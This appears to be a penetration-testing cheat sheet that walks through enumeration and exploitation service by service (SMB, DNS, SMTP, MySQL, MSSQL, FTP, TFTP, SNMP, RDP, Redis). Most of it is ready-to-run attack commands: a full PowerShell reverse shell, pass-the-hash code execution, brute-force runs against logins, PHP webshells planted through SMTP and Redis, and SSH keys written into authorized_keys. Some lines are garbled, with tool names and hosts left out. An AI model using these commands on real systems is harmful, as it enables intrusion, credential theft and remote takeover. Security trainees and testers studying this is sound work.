Scan for hosts

nmap -sn $iprange -oG - | grep Up | cut -d' ' -f2 > network.txt

Port scanning

TCP Port scanner script I use.

All TCP Ports:

nmap -Pn -sC -sV -oA all -vv -p- $ip
When you're getting no where with the TCP ports - try UDP ports. Easily forgotten about!

UDP Top 100:

nmap -Pn -sU --top-ports 100 -oA udp -vv $ip

Utilize nmap's scripts

locate .nse | grep ftp

What does a script do?

nmap --script-help ftp-anon


uniscan -u $ip -qweds

Good nmap command

nmap -T4 -n -sC -sV -p- -oN nmap-versions --script='*vuln*' [ip]

unicornscan + nmap = onetwopunch

Unicornscan supports asynchronous scans, speeding port scans on all 65535 ports. Nmap has powerful features that unicornscan does not have. With onetwopunch, unicornscan is used first to identify open ports, and then those ports are passed to nmap to perform further enumeration.
./ -t targets.txt -i tun0 -n '-T4 -n -sC -sV -oN nmap-versions --script=*vuln*'

Vulnerability scanning

NSE scripts that scans for vulnerabilities are at ls -l /usr/share/nmap/scripts/*vuln*.
nmap -p 80 --script=all $ip - Scan a target using all NSE scripts. May take an hour to complete.
nmap -p 80 --script=*vuln* $ip - Scan a target using all NSE vuln scripts.
nmap -p 80 --script=http*vuln* $ip - Scan a target using all HTTP vulns NSE scripts.
nmap -p 21 --script=ftp-anon $ip/24 - Scan entire network for FTP servers that allow anonymous access.
nmap -p 80 --script=http-vuln-cve2010-2861 $ip/24 - Scan entire network for a directory traversal vulnerability. It can even retrieve admin's password hash.

Search services vulnerabilities

searchsploit --exclude=dos -t apache 2.2.3
msfconsole; > search apache 2.2.3


Find name servers
host -t ns $ip


fierce -dns $domain
Find email servers
host -t mx $ip
Subdomain bruteforcing
for ip in $(cat list.txt); do host $ip.$website; done
Reverse dns lookup bruteforcing
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Zone transfer request

When initialising a zone transfer, the attacker will first need to know the name of the zone which they are targeting and then specify the IP address of the DNS server to perform the zone transfer against.
Below is a zone transfer against an open DNS server. You can use either of the commands below:
dig <target domain> @<dns server> axfr host -l <target domain> <dns server>
The ‘@’ symbol is used to specify the target DNS server
host -l $ip ns1.$ip
dnsrecon -d $ip -t axfr
Finds nameservers for a given domain
host -t ns $ip| cut -d " " -f 4 #
dnsenum $ip
Nmap zone transfer scan
nmap $ip --script=dns-zone-transfer -p 53
Finds the domain names for a host.
whois $ip
Find the IP and authoritative servers.
nslookup $ip
Finds miss configure DNS entries.
host -t ns $ip
TheHarvester finds subdomains in google, bing, etc
python -l 500 -b all -d $ip


Server Message Block (SMB) Protocol is a network file sharing protocol, and as implemented in Microsoft Windows
Samba has provided secure, stable and fast file and print services for all clients using the SMB/CIFS protocol, such as all versions of DOS and Windows, OS/2, Linux and many others
SMB Version
Windows version
Microsoft Windows NT 4.0
SMB 1.0
Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2
SMB 2.0
Windows Vista & Windows Server 2008
SMB 2.1
Windows 7 and Windows Server 2008 R2
SMB 3.0
Windows 8 and Windows Server 2012
SMB 3.0.2
Windows 8.1 and Windows Server 2012 R2
SMB 3.1.1
Windows 10 and Windows Server 2016

SMB uses the following TCP and UDP ports:

netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp
netbios-dgm 138/tcp # NETBIOS Datagram Service
netbios-dgm 138/udp
netbios-ssn 139/tcp # NETBIOS session service
netbios-ssn 139/udp
microsoft-ds 445/tcp # if you are using Active Directory


  • Enumerate Hostname - nmblookup -A $ip
  • List Shares
    • smbmap -H $ip
    • echo exit | smbclient -L \\\\$ip
    • nmap --script smb-enum-shares -p 139,445 $ip
  • Check Null Sessions
    • smbmap -H $ip
    • rpcclient -U "" -N $ip
    • smbclient \\\\$ip\\[share name]
  • Check for Vulnerabilities - nmap --script smb-vuln* -p 139,445 $ip
  • Overall Scan - enum4linux -a $ip
  • Manual Inspection
    • $ip (port)
Get a shell with smbmap
smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""""""; $port=""""4445"""";$c=New-Object;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
Quick script to check for vulns
mblookup — NetBIOS over TCP/IP client used to lookup NetBIOS names

Scanning for the NetBIOS Service

SMB NetBIOS service listens on TCP ports 139 and 445, as well as several UDP ports.
nmap -p 139,445 --open -oG smb.txt
nbtscan -r

Null Session Enumeration

Vulnerable SMB Versions

Vulnerable versions:

Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
Most Samba (Unix) servers
List of SMB versions and corresponding Windows versions:
SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
Empty LM and NTLM hashes:
Empty LM Hash: aad3b435b51404eeaad3b435b51404ee
Empty NT Hash: 31d6cfe0d16ae931b73c59d7e0c089c0
Manually probe a SMB server
rpcclient -U '' $ip
rpcclient $> srvinfo # operating system version
rpcclient $> netshareenumall # enumerate all shares and its paths
rpcclient $> enumdomusers # enumerate usernames defined on the server
rpcclient $> getdompwinfo # smb password policy configured on the server
Apparently the rpcclient version in OffSec VM does not work well with creating null sessions. A downgrade to samba-4.5.15 is required: Place the export commands into a script and source it before using rpcclient to use the downgraded version, or place it in bashrc. NOTE, once downgraded, pth-winexe doesn't seem to work.
Wrapper around smb programs like rpcclient to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using.
enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ip
Works perfectly, list shares and permissions, enum users, disks, code execute and run modules like mimikatz. Hashes work. Also will tell you exact version of Windows
crackmapexec -u 'guest' -p '' --shares $ip
crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
crackmapexec -u 'guest' -p '' --users $ip
crackmapexec smb -u Administrator -p P@ssw0rd
crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution
Also will tell you exact version of windows:
Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution doesn't work.
smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
smbmap -u guest -p '' -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work
generally works a bit better than enum4linux as it enum4linux tends to error out a bit
downloads to the /usr/share/smbmap directory
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Download all

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q #downloads a file in quiet mode
smbmap -R $sharename -H $ip #Recursively list dirs, and files
smbmap -H $ip
default port it checks is 445, use -P 139 to point it at that port if 445 fails


Access SMB shares interactively, seems to work with anonymous access. Hashes don't work.
smbclient //$ip/wwwroot
smbclient //$ip/C$ WIN20082017 -U Administrator
smbclient //$ip/C$ A433F6C2B0D8BB92D7288ECFFACFC7CD -U Administrator --pw-nt-hash # make sure to only use the NT portion of the hash
WARNING, be careful when using the get command to download absolute path files from the remote system. Eg. get /etc/passwd will download the passwd file and overwrite YOUR /etc/passwd. Use get /etc/passwd /tmp/passwd instead.
To download recursively:
# Within smbclient, download everything recursively:
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir'
lcd '~/path/to/download/to/'
mget *
Works great sometimes. Can open a windows cmd shell.
pth-winexe -U administrator%WIN20082017 //$ipcmd # using a plaintext password
pth-winexe -U Administrator%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # ntlm hash encrypted with
pth-winexe -U domain/user%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # domain user
pth-winexe -U Administrator%8F49412C8D29DF02FB62879E33FBB745:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # lm+ntlm hash encrypted with
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # ntlm hash + empty lm hash
# or
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U Administrator% //$ip cmd

#SMB Enumeration using nmap
#(c) Mike Digital Offensive
if [ -z "$1" ]
echo "Error please provide host to enumerate"
nmap -script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $1

Samba version checker

#Author: rewardone
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./ RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
nmblookup -A $ip
enum4linux -a $ip
Used to enumerate data from Windows and Samba hosts and is a wrapper for smbclient, rpcclient, net and nmblookup
Look for users, groups, shares, workgroup/domains and password policies
list smb nmap scripts
locate .nse | grep smb

find SAMBA version number using the SMB OS discovery script:

nmap -A $ip -p139
then google to see if version is vulnerable
SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename

Use the GUI to browse and download ^ example above

Brute force login

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv


Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum. If you specify a password file, it will automatically attempt to brute force the user accounts when its finished enumerating.

Null Session

A null SMB session can be used to gather passwords and useful information from SMB 1 by looking in shares that are not password protected for interesting files. Windows NT/2000 XP default settings allow this. Windows 2003/XP SP2 SMB this behaviour is disabled.

Null session and extract information.

nbtscan -r $ip


msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run
msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run

Show all nmap SMB scripts

ls -ls /usr/share/nmap/scripts/smb*
Quick enum:
nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Quick vuln scan:
nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Full enum and vuln scanning:
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Full enum & vuln scan:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
smbclient //$ip/share -U username
smblclient -N -L \\$ip
Anonymous mount:
smbclient //$ip/share # hit enter with blank password

Eternal Blue

Exploits a critical vulnerability in the SMBv1 protocol
Worth testing Eternal blue - you might get lucky although (the system should be patched to fix this)

Vulnerable versions

Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016
nmap -p 445 $ip --script=smb-vuln-ms17-010
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Any metasploit exploit through Netbios over TCP in 139, you need to set:
set SMBDirect false


Show all mounts
showmount -e $ip
Mount a NFS share
mount $ip:/vol/share /mnt/nfs
Use nfspy to mount a share. Will get around permission errors
nfspysh -o server=$ip:/home/vulnix/


nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306

Nmap scan

nmap -sV -Pn -vv -script=mysql* $ip -p 3306

Vuln scanning:

sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
If Mysql is running as root and you have access, you can run commands:
mysql> select do_system('id');
mysql> \! sh

Enumerate MSSQL Servers on the network

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info $ip

Bruteforce MsSql

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Log in to a MsSql server:

# root@kali:~/dirsearch# cat ../.freetds.conf
host = $ip
port = 1433
tds version = 8.0
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME


Things to remember:

  • Used to send mail
  • Always do users enumeration
  • Mail is stored (in linux) in /var/log/mail/username. If you have LFI maybe you can connect to mail server and input webshell.
    • telnet $ip 25 EHLO rowbot MAIL FROM:[email protected] RCPT TO:$usernamehere DATA Subject: shell <?php system($_GET['cmd']); ?> . quit
    symfonos:1 box
Completed machine with the above vulnerability: Symfonos:1
It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
The server is asked to verify whether a particular email address or username actually exists.
This command is used to invert roles between the client and the server, without the need to run a new connaction.
With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).
This SMTP command asks for a confirmation about the identification of a mailing list.
It’s a client’s request for some information that can be useful for the a successful transfer of the email.
It terminates the SMTP conversation.
for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Honeypot-Captures/ -t $ip > smtpuserenum
then grep exists
use auxiliary/scanner/smtp/smtp_enum
Python script
import socket
import sys
if len(sys.argv) != 2:
print "Usage: <username>"
# Create a Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Server
connect = s.connect(('',25))
# Receive the banner
banner = s.recv(1024)
print banner
# VRFY a user
s.send('VRFY ' + sys.argv[1] + '\r\n')
result = s.recv(1024)
print result
# Close the socket
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
Enumeration and vuln scanning:
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip


hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Metasploit user enumeration

use auxiliary/scanner/smtp/smtp_enum

Testing for open relay

telnet $ip 25
EHLO root
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.

RPC (135)

Enumerate, shows if any NFS mount exposed:

rpcinfo -p $ip
Get a list of .exe's that are using either TCP UDP HTTP and SMB via named pipes $ip | grep .exe | awk '{print $2}'
nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom

FTP enumeration


nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
If anonymous login or any other login is allowed but you can't get Filezilla to open it. Play about with the connection settings, ACTIVE\PASSIVE\AUTO.


hydra -l user -P /usr/share/john/password.lst ftp://$ip:21

Bruteforce with metasploit

msfconsole -q msf> search type:auxiliary login: msf> use auxiliary/scanner/ftp/ftp_login

Vuln scan

nmap --script=ftp-* -p 21 $ip


If unauthenticated access is allowed with write permissions you can upload a shell:
tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
nmap -sU -p 69 --script tftp-enum.nse $ip
use auxiliary/scanner/tftp/tftpbrute
connecting/interacting: tftp $ip tftp> put payload.exe tftp> get file.txt


User enumeration

use auxiliary/scanner/ssh/ssh_enumusers
set user_file /usr/share/wordlists/metasploit/unix_users.txt
set user_file /usr/share/seclists/Usernames/Names/names.txt
python /usr/share/exploitdb/exploits/linux/remote/ -U /usr/share/wordlists/metasploit/unix_users.txt $ip
If you see the following message, it likely means that scp
PTY allocation request failed on channel 0


hydra -v -V -l root -P password-file.txt $ip ssh

With list of users:

hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 ssh
  • You can use -w to slow down


Open a connection

openssl s_client -connect $ip:443

Basic SSL ciphers check

nmap --script ssl-enum-ciphers -p 443 $ip
  • Look for unsafe ciphers such as Triple-DES and Blowfish
  • Very complete tool for SSL auditing is, finds BEAST, FREAK, POODLE, heart bleed, etc...



enumerate Community strings
./onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
Community string too long If you see this download onesixtyone from Github and run it there


snmp-check -t $ip -c public
use nmap to enumerate info
nmap -sU -p161 --script "snmp-*" $ip


apt install snmp-mibs-downloader #translates MIBs into readable format
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
snmpwalk -c public -v1 $ip
snmpenum $ip public windows.txt
Less noisy:
snmpwalk -c public -v1 $ip
Based on UDP, stateless and susceptible to UDP spoofing
nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1 # we need to know that there is a community called public
snmpwalk -c public -v1 # enumerate windows users
snmpwalk -c public -v1 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip


Test authentication:

telnet $ip 110
USER uer@$ip
PASS admin
retr 1


port 79

Find Logged in users on target.

finger @$ip
if there is no user logged in this will show no username

Check User is existed or not.

finger $username@$ip
The finger command is very useful for checking users on target but it’s painful if brute-forced for a username.

Using Metasploit fo Brute-force target

use auxiliary/scanner/finger/finger_users
set rhosts $ip
set users_file
cd /tmp/
tar -xvf finger-user-enum-1.0.tar.gz
cd finger-user-enum-1.0
perl -t -U /tmp/rockyou-top1000.txt


Install RDP nmap scripts
nmap -p 3389 --script rdp-ntlm-info $ip


ncrack -vv --user administrator -P password-file.txt rdp://$ip
hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip


Test MS14-068



First, the web server on the server broadcasts, including a simple PHP code and create a back door, which will help us to execute commands on the server.
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
CONFIG GET dbfilename
1) "dbfilename"
2) "shell.php"
SET cmd "<?php system($_GET['cmd']); ?>"
which can be accessed using

Upload SSH key

Second, file type found in the users home directory because it is our right and remote SSH access with a key instead of using the password used to connect to create key, they may be directly un-encrypted user rights that provide access to the system.
1: ssh-keygen -t rsa
3: (echo -e "\n"; cat; echo -e "\n") > auth_key
5: cat auth_key | redis-cli -h hostname -x set crackit
6: redis-cli -h hostname
8: config set dir /root/.ssh/
9: config get dir
10: config set dbfilename "authorized_keys"
11: save
13: config set dir /home/user/.ssh/
14: save
16: config set dir /home/admin/.ssh/